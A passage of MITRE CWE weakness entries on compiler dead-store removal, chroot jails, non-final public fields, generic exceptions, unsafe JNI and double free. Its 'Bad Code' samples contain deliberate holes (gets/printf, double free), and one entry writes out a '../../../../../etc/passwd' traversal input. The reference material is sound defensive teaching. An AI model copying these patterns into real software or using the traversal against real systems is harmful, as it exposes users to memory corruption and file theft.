PeerOfWeakness BaseWeakness Base386Symbolic Name not Mapping to Correct Object
Research Concepts1000
+ Relevant Properties
  • Equivalence
  • Uniqueness
+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsComparing Classes by Name
CLASPComparing classes by name
CERT Java Secure CodingOBJ09-JCompare classes and not class names
Software Fault PatternsSFP1Glitch in computation
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Common_Consequences, Description, Relationships, Other_Notes, Relevant_Properties, Taxonomy_Mappings
2009-03-10CWE Content TeamMITREInternal
updated Other_Notes
2009-07-27CWE Content TeamMITREInternal
updated Demonstrative_Examples
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated Demonstrative_Examples, Relationships, Taxonomy_Mappings
2014-07-30CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11Comparing Classes by Name

CWE-14: Compiler Removal of Code to Clear Buffers

Weakness ID: 14
Abstraction: Base
Status: Draft
Presentation Filter:
+ Description

Description Summary

Sensitive memory is cleared according to the source code, but compiler optimizations leave the memory untouched when it is not read from again, aka "dead store removal."

Extended Description

This compiler optimization error occurs when:

1. Secret data are stored in memory.

2. The secret data are scrubbed from memory by overwriting its contents.

3. The source code is compiled using an optimizing compiler, which identifies and removes the function that overwrites the contents as a dead store because the memory is not used subsequently.

+ Time of Introduction
  • Implementation
  • Build and Compilation
+ Applicable Platforms

Languages

C

C++

+ Common Consequences
ScopeEffect
Confidentiality
Access Control

Technical Impact: Read memory; Bypass protection mechanism

This weakness will allow data that has not been cleared from memory to be read. If this data contains sensitive password information, then an attacker can read the password and use the information to bypass protection mechanisms.

+ Detection Methods

Black Box

This specific weakness is impossible to detect using black box methods. While an analyst could examine memory to see that it has not been scrubbed, an analysis of the executable would not be successful. This is because the compiler has already removed the relevant code. Only the source code shows whether the programmer intended to clear the memory or not, so this weakness is indistinguishable from others.

White Box

This weakness is only detectable using white box methods (see black box detection factor). Careful analysis is required to determine if the code is likely to be removed by the compiler.

+ Demonstrative Examples

Example 1

The following code reads a password from the user, uses the password to connect to a back-end mainframe and then attempts to scrub the password from memory using memset().

(Bad Code)
Example Language:
void GetData(char *MFAddr) {
char pwd[64];
if (GetPasswordFromUser(pwd, sizeof(pwd))) {

if (ConnectToMainframe(MFAddr, pwd)) {

// Interaction with mainframe
}
}
memset(pwd, 0, sizeof(pwd));
}

The code in the example will behave correctly if it is executed verbatim, but if the code is compiled using an optimizing compiler, such as Microsoft Visual C++ .NET or GCC 3.x, then the call to memset() will be removed as a dead store because the buffer pwd is not used after its value is overwritten [18]. Because the buffer pwd contains a sensitive value, the application may be vulnerable to attack if the data are left memory resident. If attackers are able to access the correct region of memory, they may use the recovered password to gain control of the system.

It is common practice to overwrite sensitive data manipulated in memory, such as passwords or cryptographic keys, in order to prevent attackers from learning system secrets. However, with the advent of optimizing compilers, programs do not always behave as their source code alone would suggest. In the example, the compiler interprets the call to memset() as dead code because the memory being written to is not subsequently used, despite the fact that there is clearly a security motivation for the operation to occur. The problem here is that many compilers, and in fact many programming languages, do not take this and other security concerns into consideration in their efforts to improve efficiency.

Attackers typically exploit this type of vulnerability by using a core dump or runtime mechanism to access the memory used by a particular application and recover the secret information. Once an attacker has access to the secret information, it is relatively straightforward to further exploit the system and possibly compromise other resources with which the application interacts.

+ Potential Mitigations

Phase: Implementation

Store the sensitive data in a "volatile" memory location if available.

Phase: Build and Compilation

If possible, configure your compiler so that it does not remove dead stores.

Phase: Architecture and Design

Where possible, encrypt sensitive data that are used by a software system.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfCategoryCategory2Environment
Seven Pernicious Kingdoms (primary)700
ChildOfCategoryCategory633Weaknesses that Affect Memory
Resource-specific Weaknesses (primary)631
ChildOfCategoryCategory729OWASP Top Ten 2004 Category A8 - Insecure Storage
Weaknesses in OWASP Top Ten (2004) (primary)711
ChildOfWeakness BaseWeakness Base733Compiler Optimization Removal or Modification of Security-critical Code
Development Concepts (primary)699
Research Concepts (primary)1000
ChildOfCategoryCategory747CERT C Secure Coding Section 49 - Miscellaneous (MSC)
Weaknesses Addressed by the CERT C Secure Coding Standard (primary)734
ChildOfCategoryCategory883CERT C++ Secure Coding Section 49 - Miscellaneous (MSC)
Weaknesses Addressed by the CERT C++ Secure Coding Standard (primary)868
ChildOfCategoryCategory963SFP Secondary Cluster: Exposed Data
Software Fault Pattern (SFP) Clusters (primary)888
MemberOfViewView884CWE Cross-section
CWE Cross-section (primary)884
+ Affected Resources
  • Memory
+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsInsecure Compiler Optimization
PLOVERSensitive memory uncleared by compiler optimization
OWASP Top Ten 2004A8CWE More SpecificInsecure Storage
CERT C Secure CodingMSC06-CBe aware of compiler optimization when dealing with sensitive data
CERT C++ Secure CodingMSC06-CPPBe aware of compiler optimization when dealing with sensitive data
Software Fault PatternsSFP23Exposed Data
+ References
[REF-11] M. Howard and D. LeBlanc. "Writing Secure Code". Chapter 9, "A Compiler Optimization Caveat" Page 322. 2nd Edition. Microsoft. 2002.
Michael Howard. "When scrubbing secrets in memory doesn't work". BugTraq. 2002-11-05. <http://cert.uni-stuttgart.de/archive/bugtraq/2002/11/msg00046.html>.
Michael Howard. "Some Bad News and Some Good News". Microsoft. 2002-10-21. <http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dncode/html/secure10102002.asp>.
Joseph Wagner. "GNU GCC: Optimizer Removes Code Necessary for Security". Bugtraq. 2002-11-16. <http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2002-11/0257.html>.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Relationships, Other_Notes, Taxonomy_Mappings
2008-10-14CWE Content TeamMITREInternal
updated Relationships
2008-11-24CWE Content TeamMITREInternal
updated Applicable_Platforms, Description, Detection_Factors, Other_Notes, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction
2009-05-27CWE Content TeamMITREInternal
updated Demonstrative_Examples
2010-02-16CWE Content TeamMITREInternal
updated References
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2011-09-13CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated Common_Consequences, References, Relationships
2014-07-30CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2017-01-19CWE Content TeamMITREInternal
updated Relationships
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11Insecure Compiler Optimization

CWE-243: Creation of chroot Jail Without Changing Working Directory

Weakness ID: 243
Abstraction: Variant
Status: Draft
Presentation Filter:
+ Description

Description Summary

The program uses the chroot() system call to create a jail, but does not change the working directory afterward. This does not prevent access to files outside of the jail.

Extended Description

Improper use of chroot() may allow attackers to escape from the chroot jail. The chroot() function call does not change the process's current working directory, so relative paths may still refer to file system resources outside of the chroot jail after chroot() has been called.

+ Time of Introduction
  • Implementation
+ Applicable Platforms

Languages

C

C++

Operating Systems

UNIX

+ Common Consequences
ScopeEffect
Confidentiality

Technical Impact: Read files or directories

+ Likelihood of Exploit

High

+ Demonstrative Examples

Example 1

Consider the following source code from a (hypothetical) FTP server:

(Bad Code)
Example Language:
chroot("/var/ftproot");
...
fgets(filename, sizeof(filename), network);
localfile = fopen(filename, "r");
while ((len = fread(buf, 1, sizeof(buf), localfile)) != EOF) {
fwrite(buf, 1, sizeof(buf), network);
}
fclose(localfile);

This code is responsible for reading a filename from the network, opening the corresponding file on the local machine, and sending the contents over the network. This code could be used to implement the FTP GET command. The FTP server calls chroot() in its initialization routines in an attempt to prevent access to files outside of /var/ftproot. But because the server does not change the current working directory by calling chdir("/"), an attacker could request the file "../../../../../etc/passwd" and obtain a copy of the system password file.

+ Background Details

The chroot() system call allows a process to change its perception of the root directory of the file system. After properly invoking chroot(), a process cannot access any files outside the directory tree defined by the new root directory. Such an environment is called a chroot jail and is commonly used to prevent the possibility that a processes could be subverted and used to access unauthorized files. For instance, many FTP servers run in chroot jails to prevent an attacker who discovers a new vulnerability in the server from being able to download the password file or other sensitive files on the system.

+ Weakness Ordinalities
OrdinalityDescription
Resultant
(where the weakness is typically related to the presence of some other weaknesses)
+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class227Improper Fulfillment of API Contract ('API Abuse')
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
ChildOfWeakness ClassWeakness Class573Improper Following of Specification by Caller
Research Concepts1000
ChildOfCategoryCategory632Weaknesses that Affect Files or Directories
Resource-specific Weaknesses (primary)631
ChildOfWeakness ClassWeakness Class669Incorrect Resource Transfer Between Spheres
Research Concepts (primary)1000
ChildOfCategoryCategory979SFP Secondary Cluster: Failed Chroot Jail
Software Fault Pattern (SFP) Clusters (primary)888
+ Affected Resources
  • File/Directory
+ Causal Nature

Explicit

+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsDirectory Restriction
Software Fault PatternsSFP17Failed chroot jail
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-09-08CWE Content TeamMITREInternal
updated Applicable_Platforms, Background_Details, Description, Relationships, Taxonomy_Mappings, Weakness_Ordinalities
2008-10-14CWE Content TeamMITREInternal
updated Description
2009-03-10CWE Content TeamMITREInternal
updated Demonstrative_Examples
2009-05-27CWE Content TeamMITREInternal
updated Demonstrative_Examples
2010-12-13CWE Content TeamMITREInternal
updated Demonstrative_Examples, Name
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2012-05-11CWE Content TeamMITREInternal
updated Relationships
2014-07-30CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
Previous Entry Names
Change DatePrevious Entry Name
2008-01-30Directory Restriction
2010-12-13Failure to Change Working Directory in chroot Jail

CWE-493: Critical Public Variable Without Final Modifier

Weakness ID: 493
Abstraction: Variant
Status: Draft
Presentation Filter:
+ Description

Description Summary

The product has a critical public variable that is not final, which allows the variable to be modified to contain unexpected values.

Extended Description

If a field is non-final and public, it can be changed once the value is set by any function that has access to the class which contains the field. This could lead to a vulnerability if other parts of the program make assumptions about the contents of that field.

+ Time of Introduction
  • Implementation
+ Applicable Platforms

Languages

Java

C++

+ Common Consequences
ScopeEffect
Integrity

Technical Impact: Modify application data

The object could potentially be tampered with.

Confidentiality

Technical Impact: Read application data

The object could potentially allow the object to be read.

+ Likelihood of Exploit

High

+ Demonstrative Examples

Example 1

Suppose this WidgetData class is used for an e-commerce web site. The programmer attempts to prevent price-tampering attacks by setting the price of the widget using the constructor.

(Bad Code)
Example Language: Java 
public final class WidgetData extends Applet {
public float price;
...
public WidgetData(...) {
this.price = LookupPrice("MyWidgetType");
}
}

The price field is not final. Even though the value is set by the constructor, it could be modified by anybody that has access to an instance of WidgetData.

Example 2

Assume the following code is intended to provide the location of a configuration file that controls execution of the application.

(Bad Code)
Example Language: C++ 
public string configPath = "/etc/application/config.dat";
(Bad Code)
Example Language: Java 
public String configPath = new String("/etc/application/config.dat");

While this field is readable from any function, and thus might allow an information leak of a pathname, a more serious problem is that it can be changed by any function.

+ Potential Mitigations

Phase: Implementation

Declare all public fields as final when possible, especially if it is used to maintain internal state of an Applet or of classes used by an Applet. If a field must be public, then perform all appropriate sanity checks before accessing the field from your code.

+ Background Details

Mobile code, such as a Java Applet, is code that is transmitted across a network and executed on a remote machine. Because mobile code developers have little if any control of the environment in which their code will execute, special security concerns become relevant. One of the biggest environmental threats results from the risk that the mobile code will run side-by-side with other, potentially malicious, mobile code. Because all of the popular web browsers execute code from multiple sources together in the same JVM, many of the security guidelines for mobile code are focused on preventing manipulation of your objects' state and behavior by adversaries who have access to the same virtual machine where your program is running.

Final provides security by only allowing non-mutable objects to be changed after being set. However, only objects which are not extended can be made final.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class216Containment Errors (Container Errors)
Research Concepts1000
ChildOfWeakness ClassWeakness Class485Insufficient Encapsulation
Seven Pernicious Kingdoms (primary)700
ChildOfCategoryCategory490Mobile Code Issues
Development Concepts (primary)699
ChildOfWeakness ClassWeakness Class668Exposure of Resource to Wrong Sphere
Research Concepts (primary)1000
ChildOfCategoryCategory849CERT Java Secure Coding Section 04 - Object Orientation (OBJ)
Weaknesses Addressed by the CERT Java Secure Coding Standard (primary)844
ChildOfCategoryCategory1002SFP Secondary Cluster: Unexpected Entry Points
Software Fault Pattern (SFP) Clusters (primary)888
ParentOfWeakness VariantWeakness Variant500Public Static Field Not Marked Final
Development Concepts (primary)699
Research Concepts (primary)1000
+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsMobile Code: Non-Final Public Field
CLASPFailure to provide confidentiality for stored data
CERT Java Secure CodingOBJ10-JDo not use public static nonfinal variables
Software Fault PatternsSFP28Unexpected access points
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Applicable_Platforms, Common_Consequences, Description, Likelihood_of_Exploit, Relationships, Other_Notes, Taxonomy_Mappings
2008-11-24CWE Content TeamMITREInternal
updated Background_Details, Demonstrative_Examples, Description, Other_Notes, Potential_Mitigations
2009-05-27CWE Content TeamMITREInternal
updated Background_Details, Demonstrative_Examples, Description, Relationships
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2014-07-30CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11Mobile Code: Non-final Public Field

CWE-396: Declaration of Catch for Generic Exception

Weakness ID: 396
Abstraction: Base
Status: Draft
Presentation Filter:
+ Description

Description Summary

Catching overly broad exceptions promotes complex error handling code that is more likely to contain security vulnerabilities.

Extended Description

Multiple catch blocks can get ugly and repetitive, but "condensing" catch blocks by catching a high-level class like Exception can obscure exceptions that deserve special treatment or that should not be caught at this point in the program. Catching an overly broad exception essentially defeats the purpose of Java's typed exceptions, and can become particularly dangerous if the program grows and begins to throw new types of exceptions. The new exception types will not receive any attention.

+ Time of Introduction
  • Architecture and Design
  • Implementation
+ Applicable Platforms

Languages

C++

Java

.NET

+ Common Consequences
ScopeEffect
Non-Repudiation
Other

Technical Impact: Hide activities; Alter execution logic

+ Demonstrative Examples

Example 1

The following code excerpt handles three types of exceptions in an identical fashion.

(Good Code)
Example Language: Java 
try {
doExchange();
}
catch (IOException e) {
logger.error("doExchange failed", e);
}
catch (InvocationTargetException e) {

logger.error("doExchange failed", e);
}
catch (SQLException e) {

logger.error("doExchange failed", e);
}

At first blush, it may seem preferable to deal with these exceptions in a single catch block, as follows:

(Bad Code)
 
try {
doExchange();
}
catch (Exception e) {
logger.error("doExchange failed", e);
}

However, if doExchange() is modified to throw a new type of exception that should be handled in some different kind of way, the broad catch block will prevent the compiler from pointing out the situation. Further, the new catch block will now also handle exceptions derived from RuntimeException such as ClassCastException, and NullPointerException, which is not the programmer's intent.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class221Information Loss or Omission
Research Concepts1000
ChildOfCategoryCategory388Error Handling
Seven Pernicious Kingdoms (primary)700
ChildOfCategoryCategory389Error Conditions, Return Values, Status Codes
Development Concepts (primary)699
ChildOfWeakness ClassWeakness Class705Incorrect Control Flow Scoping
Research Concepts (primary)1000
ChildOfWeakness ClassWeakness Class755Improper Handling of Exceptional Conditions
Research Concepts1000
ChildOfCategoryCategory960SFP Secondary Cluster: Ambiguous Exception Type
Software Fault Pattern (SFP) Clusters (primary)888
+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsOverly-Broad Catch Block
Software Fault PatternsSFP5Ambiguous Exception Type
+ References
[REF-17] Michael Howard, David LeBlanc and John Viega. "24 Deadly Sins of Software Security". "Sin 9: Catching Exceptions." Page 157. McGraw-Hill. 2010.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings
2008-09-24CWE Content TeamMITREInternal
Removed C from Applicable_Platforms
2008-10-14CWE Content TeamMITREInternal
updated Applicable_Platforms
2009-03-10CWE Content TeamMITREInternal
updated Relationships
2009-05-27CWE Content TeamMITREInternal
updated Demonstrative_Examples
2009-10-29CWE Content TeamMITREInternal
updated Description, Other_Notes
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2012-05-11CWE Content TeamMITREInternal
updated References, Relationships
2014-07-30CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11Overly-Broad Catch Block

CWE-397: Declaration of Throws for Generic Exception

Weakness ID: 397
Abstraction: Base
Status: Draft
Presentation Filter:
+ Description

Description Summary

Throwing overly broad exceptions promotes complex error handling code that is more likely to contain security vulnerabilities.

Extended Description

Declaring a method to throw Exception or Throwable makes it difficult for callers to perform proper error handling and error recovery. Java's exception mechanism, for example, is set up to make it easy for callers to anticipate what can go wrong and write code to handle each specific exceptional circumstance. Declaring that a method throws a generic form of exception defeats this system.

+ Time of Introduction
  • Architecture and Design
  • Implementation
+ Applicable Platforms

Languages

C++

Java

.NET

+ Common Consequences
ScopeEffect
Non-Repudiation
Other

Technical Impact: Hide activities; Alter execution logic

+ Demonstrative Examples

Example 1

The following method throws three types of exceptions.

(Good Code)
Example Language: Java 
public void doExchange() throws IOException, InvocationTargetException, SQLException {
...
}

While it might seem tidier to write

(Bad Code)
 
public void doExchange() throws Exception {
...
}

doing so hampers the caller's ability to understand and handle the exceptions that occur. Further, if a later revision of doExchange() introduces a new type of exception that should be treated differently than previous exceptions, there is no easy way to enforce this requirement.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class221Information Loss or Omission
Research Concepts1000
ChildOfCategoryCategory388Error Handling
Seven Pernicious Kingdoms (primary)700
ChildOfCategoryCategory389Error Conditions, Return Values, Status Codes
Development Concepts (primary)699
ChildOfWeakness ClassWeakness Class703Improper Check or Handling of Exceptional Conditions
Research Concepts1000
ChildOfWeakness ClassWeakness Class705Incorrect Control Flow Scoping
Research Concepts (primary)1000
ChildOfCategoryCategory851CERT Java Secure Coding Section 06 - Exceptional Behavior (ERR)
Weaknesses Addressed by the CERT Java Secure Coding Standard (primary)844
ChildOfCategoryCategory960SFP Secondary Cluster: Ambiguous Exception Type
Software Fault Pattern (SFP) Clusters (primary)888
+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsOverly-Broad Throws Declaration
CERT Java Secure CodingERR07-JDo not throw RuntimeException, Exception, or Throwable
Software Fault PatternsSFP5Ambiguous Exception Type
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings
2008-09-24CWE Content TeamMITREInternal
Removed C from Applicable_Platforms
2008-10-14CWE Content TeamMITREInternal
updated Applicable_Platforms
2009-03-10CWE Content TeamMITREInternal
updated Relationships
2009-05-27CWE Content TeamMITREInternal
updated Demonstrative_Examples
2009-10-29CWE Content TeamMITREInternal
updated Description, Other_Notes
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated Relationships
2014-07-30CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11Overly-Broad Throws Declaration

CWE-111: Direct Use of Unsafe JNI

Weakness ID: 111
Abstraction: Base
Status: Draft
Presentation Filter:
+ Description

Description Summary

When a Java application uses the Java Native Interface (JNI) to call code written in another programming language, it can expose the application to weaknesses in that code, even if those weaknesses cannot occur in Java.

Extended Description

Many safety features that programmers may take for granted simply do not apply for native code, so you must carefully review all such code for potential problems. The languages used to implement native code may be more susceptible to buffer overflows and other attacks. Native code is unprotected by the security features enforced by the runtime environment, such as strong typing and array bounds checking.

+ Time of Introduction
  • Implementation
+ Applicable Platforms

Languages

Java

+ Common Consequences
ScopeEffect
Access Control

Technical Impact: Bypass protection mechanism

+ Demonstrative Examples

Example 1

The following code defines a class named Echo. The class declares one native method (defined below), which uses C to echo commands entered on the console back to the user. The following C code defines the native method implemented in the Echo class:

(Bad Code)
Example Language: Java 
class Echo {

public native void runEcho();
static {

System.loadLibrary("echo");
}
public static void main(String[] args) {

new Echo().runEcho();
}
}
(Bad Code)
Example Language:
#include <jni.h>
#include "Echo.h"//the java class above compiled with javah
#include <stdio.h>

JNIEXPORT void JNICALL
Java_Echo_runEcho(JNIEnv *env, jobject obj)
{
char buf[64];
gets(buf);
printf(buf);
}

Because the example is implemented in Java, it may appear that it is immune to memory issues like buffer overflow vulnerabilities. Although Java does do a good job of making memory operations safe, this protection does not extend to vulnerabilities occurring in source code written in other languages that are accessed using the Java Native Interface. Despite the memory protections offered in Java, the C code in this example is vulnerable to a buffer overflow because it makes use of gets(), which does not check the length of its input.

The Sun Java(TM) Tutorial provides the following description of JNI [See Reference]: The JNI framework lets your native method utilize Java objects in the same way that Java code uses these objects. A native method can create Java objects, including arrays and strings, and then inspect and use these objects to perform its tasks. A native method can also inspect and use objects created by Java application code. A native method can even update Java objects that it created or that were passed to it, and these updated objects are available to the Java application. Thus, both the native language side and the Java side of an application can create, update, and access Java objects and then share these objects between them.

The vulnerability in the example above could easily be detected through a source code audit of the native method implementation. This may not be practical or possible depending on the availability of the C source code and the way the project is built, but in many cases it may suffice. However, the ability to share objects between Java and native methods expands the potential risk to much more insidious cases where improper data handling in Java may lead to unexpected vulnerabilities in native code or unsafe operations in native code corrupt data structures in Java. Vulnerabilities in native code accessed through a Java application are typically exploited in the same manner as they are in applications written in the native language. The only challenge to such an attack is for the attacker to identify that the Java application uses native code to perform certain operations. This can be accomplished in a variety of ways, including identifying specific behaviors that are often implemented with native code or by exploiting a system information exposure in the Java application that reveals its use of JNI [See Reference].

+ Potential Mitigations

Phase: Implementation

Implement error handling around the JNI call.

Phases: Architecture and Design; Implementation

Strategy: Refactoring

Do not use JNI calls if you don't trust the native library.

Phases: Architecture and Design; Implementation

Strategy: Refactoring

Be reluctant to use JNI calls. A Java API equivalent may exist.

+ Weakness Ordinalities
OrdinalityDescription
Primary
(where the weakness exists independent of other weaknesses)
+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class20Improper Input Validation
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
ChildOfWeakness BaseWeakness Base695Use of Low-Level Functionality
Research Concepts (primary)1000
ChildOfCategoryCategory859CERT Java Secure Coding Section 14 - Platform Security (SEC)
Weaknesses Addressed by the CERT Java Secure Coding Standard (primary)844
ChildOfCategoryCategory1001SFP Secondary Cluster: Use of an Improper API
Software Fault Pattern (SFP) Clusters (primary)888
+ Causal Nature

Explicit

+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsUnsafe JNI
CERT Java Secure CodingSEC08-JDefine wrappers around native methods
Software Fault PatternsSFP3Use of an improper API
+ References
Fortify Software. "Fortify Descriptions". <http://vulncat.fortifysoftware.com>.
B. Stearns. "The Java(TM) Tutorial: The Java Native Interface". Sun Microsystems. 2005. <http://java.sun.com/docs/books/tutorial/native1.1/>.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Demonstrative_Example, Potential_Mitigations, Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Relationships, Other_Notes, References, Taxonomy_Mappings, Weakness_Ordinalities
2008-11-24CWE Content TeamMITREInternal
updated Description, Other_Notes
2009-10-29CWE Content TeamMITREInternal
updated Description, Other_Notes
2011-03-29CWE Content TeamMITREInternal
updated Demonstrative_Examples
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2013-02-21CWE Content TeamMITREInternal
updated Potential_Mitigations
2014-07-30CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11Unsafe JNI

CWE-415: Double Free

Weakness ID: 415
Abstraction: Variant
Status: Draft
Presentation Filter:
+ Description

Description Summary

The product calls free() twice on the same memory address, potentially leading to modification of unexpected memory locations.

Extended Description

When a program calls free() twice with the same argument, the program's memory management data structures become corrupted. This corruption can cause the program to crash or, in some circumstances, cause two later calls to malloc() to return the same pointer. If malloc() returns the same value twice and the program later gives the attacker control over the data that is written into this doubly-allocated memory, the program becomes vulnerable to a buffer overflow attack.

+ Alternate Terms
Double-free
+ Time of Introduction
  • Architecture and Design
  • Implementation
+ Applicable Platforms

Languages

C

C++

+ Common Consequences
ScopeEffect
Integrity
Confidentiality
Availability

Technical Impact: Execute unauthorized code or commands

Doubly freeing memory may result in a write-what-where condition, allowing an attacker to execute arbitrary code.

+ Likelihood of Exploit

Low to Medium

+ Demonstrative Examples

Example 1

The following code shows a simple example of a double free vulnerability.

(Bad Code)
Example Language:
char* ptr = (char*)malloc (SIZE);
...
if (abrt) {
free(ptr);
}
...
free(ptr);

Double free vulnerabilities have two common (and sometimes overlapping) causes:

  • Error conditions and other exceptional circumstances

  • Confusion over which part of the program is responsible for freeing the memory

Although some double free vulnerabilities are not much more complicated than the previous example, most are spread out across hundreds of lines of code or even different files. Programmers seem particularly susceptible to freeing global variables more than once.

Example 2

While contrived, this code should be exploitable on Linux distributions which do not ship with heap-chunk check summing turned on.

(Bad Code)
Example Language:
#include <stdio.h>
#include <unistd.h>
#define BUFSIZE1 512
#define BUFSIZE2 ((BUFSIZE1/2) - 8)

int main(int argc, char **argv) {
char *buf1R1;
char *buf2R1;
char *buf1R2;
buf1R1 = (char *) malloc(BUFSIZE2);
buf2R1 = (char *) malloc(BUFSIZE2);
free(buf1R1);
free(buf2R1);
buf1R2 = (char *) malloc(BUFSIZE1);
strncpy(buf1R2, argv[1], BUFSIZE1-1);
free(buf2R1);
free(buf1R2);
}
+ Observed Examples
ReferenceDescription
Chain: Signal handler contains too much functionality (CWE-828), introducing a race condition that leads to a double free (CWE-415).
Double free resultant from certain error conditions.
Double free resultant from certain error conditions.
Double free resultant from certain error conditions.
Double free from invalid ASN.1 encoding.
Double free from malformed GIF.
Double free from malformed GIF.
Double free from malformed compressed data.
+ Potential Mitigations

Phase: Architecture and Design

Choose a language that provides automatic memory management.

Phase: Implementation

Ensure that each allocation is freed only once. After freeing a chunk, set the pointer to NULL to ensure the pointer cannot be freed again. In complicated error conditions, be sure that clean-up routines respect the state of allocation properly. If the language is object oriented, ensure that object destructors delete each chunk of memory only once.

Phase: Implementation

Use a static analysis tool to find double free instances.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class398Indicator of Poor Code Quality
Seven Pernicious Kingdoms (primary)700
ChildOfCategoryCategory399Resource Management Errors
Development Concepts (primary)699
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
ChildOfCategoryCategory633Weaknesses that Affect Memory
Resource-specific Weaknesses (primary)631
ChildOfWeakness BaseWeakness Base666Operation on Resource in Wrong Phase of Lifetime
Research Concepts1000
ChildOfWeakness ClassWeakness Class675Duplicate Operations on Resource
Research Concepts1000
ChildOfCategoryCategory742CERT C Secure Coding Section 08 - Memory Management (MEM)
Weaknesses Addressed by the CERT C Secure Coding Standard (primary)734
ChildOfWeakness BaseWeakness Base825Expired Pointer Dereference
Research Concepts (primary)1000
ChildOfCategoryCategory876CERT C++ Secure Coding Section 08 - Memory Management (MEM)
Weaknesses Addressed by the CERT C++ Secure Coding Standard (primary)868
ChildOfCategoryCategory969SFP Secondary Cluster: Faulty Memory Release
Software Fault Pattern (SFP) Clusters (primary)888
PeerOfWeakness BaseWeakness Base123Write-what-where Condition
Research Concepts1000
PeerOfWeakness BaseWeakness Base416Use After Free
Development Concepts699
Research Concepts1000
MemberOfViewView630Weaknesses Examined by SAMATE
Weaknesses Examined by SAMATE (primary)630
CanFollowWeakness BaseWeakness Base364Signal Handler Race Condition
Research Concepts1000
+ Relationship Notes

This is usually resultant from another weakness, such as an unhandled error or race condition between threads. It could also be primary to weaknesses such as buffer overflows.

+ Affected Resources
  • Memory
+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
PLOVERDFREE - Double-Free Vulnerability
